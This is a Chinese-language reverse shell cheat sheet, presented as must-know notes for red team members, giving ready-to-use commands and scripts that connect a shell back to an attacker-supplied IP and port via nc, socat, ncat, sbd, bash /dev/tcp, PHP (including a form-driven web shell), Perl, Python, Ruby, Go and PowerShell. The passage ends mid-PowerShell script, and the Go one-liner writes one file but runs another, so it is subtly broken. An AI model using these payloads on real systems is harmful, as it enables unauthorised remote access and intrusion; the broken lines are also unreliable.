前言:
建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会!
最全。
反向shell-备忘录:
通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来讲,反弹shell是非常有必要的,以下将从不同的工具出发,
nc
listen:
nc -nlvp PORT
connect:
nc -e /bin/sh IP PORT
or
nc -c sh IP PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
socat
listen:
socat tcp-listen:PORT -
connect:
socat exec:/bin/sh tcp:IP:PORT
交互式版本
listen:
socat file:`tty`,raw,echo=0 tcp-listen:PORT
connect:
socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT
ncat
listen:
ncat --allow IP -vnl PORT --ssl
connect:
ncat --exec /bin/sh --ssl IP PORT
sbd
listen:
sbd -lp PORT
connect:
sbd -e /bin/sh HOST PORT
加密版版本
listen:
sbd -l -c on -k ENCRYPTION_PHRASE -p PORT
connect:
sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT
bash
TCP
bash -i >& /dev/tcp/IP/PORT 0>&1
or
bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'
使用工具nc udp协议:
nc -u -lvp PORT
connect:
sh -i >& /dev/udp/IP/PORT 0>&1
php
简单的php代码版本:
php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
完整的 PHP 脚本,带有指定要连接的 IP 地址和端口的表单:
<?php
if (empty($_POST['i']) && empty($_POST['p'])) {
echo "IP address and port not specified!";
}
else
{
$ip = $_POST["i"];
$port = $_POST["p"];
$shell = 'uname -a; w; id; /bin/sh -i';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$process = null;
$pipes = null;
$errno = "";
$errstr = "";
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "$errstr ($errno)";
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
echo "ERROR: Can't spawn shell";
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while(!feof($sock) && !feof($pipes[1])) {
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
$input = fread($sock, $chunk_size);
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
$input = fread($pipes[1], $chunk_size);
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
$input = fread($pipes[2], $chunk_size);
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
?>
<html>
<body>
<form method="post">
<input type="text" name="i" />
<input type="text" name="p" />
<input type="submit" />
</form>
</body>
</html>
Perl
perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python脚本版本:
#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
或从命令行使用python -c
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
Ruby
#!/usr/bin/ruby
require 'socket';
c=TCPSocket.new('IP', PORT)
$stdin.reopen(c)
$stdout.reopen(c)
$stderr.reopen(c)
$stdin.each_line{
|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){
|fd| fd.each_line {
|o| c.puts(o.strip) }}) rescue nil }
或作为单行:
ruby -rsocket -e'f=TCPSocket.open("IP", PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Golang
使用源代码创建文件,运行然后删除源文件:
package main;
import"os/exec";
import"net";
func main() {
c, _ := net.Dial("tcp","IP:PORT");
cmd := exec.Command("/bin/sh");
cmd.Stdin=c;
cmd.Stdout = c;
cmd.Stderr = c;
cmd.Run()
}
保存文件,例如test.go,构建并运行:go run test.go
或者直接命令行
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/rev.go && go run /tmp/test.go && rm /tmp/test.go
Powershell
$address = 'IP'
$port = 'PORT'
function cleanup {
if ($client.Connected -eq $true) {
$client.Close()}
if ($process.ExitCode -ne $null) {
$process.Close()}
exit}
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.RedirectStandardError = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.A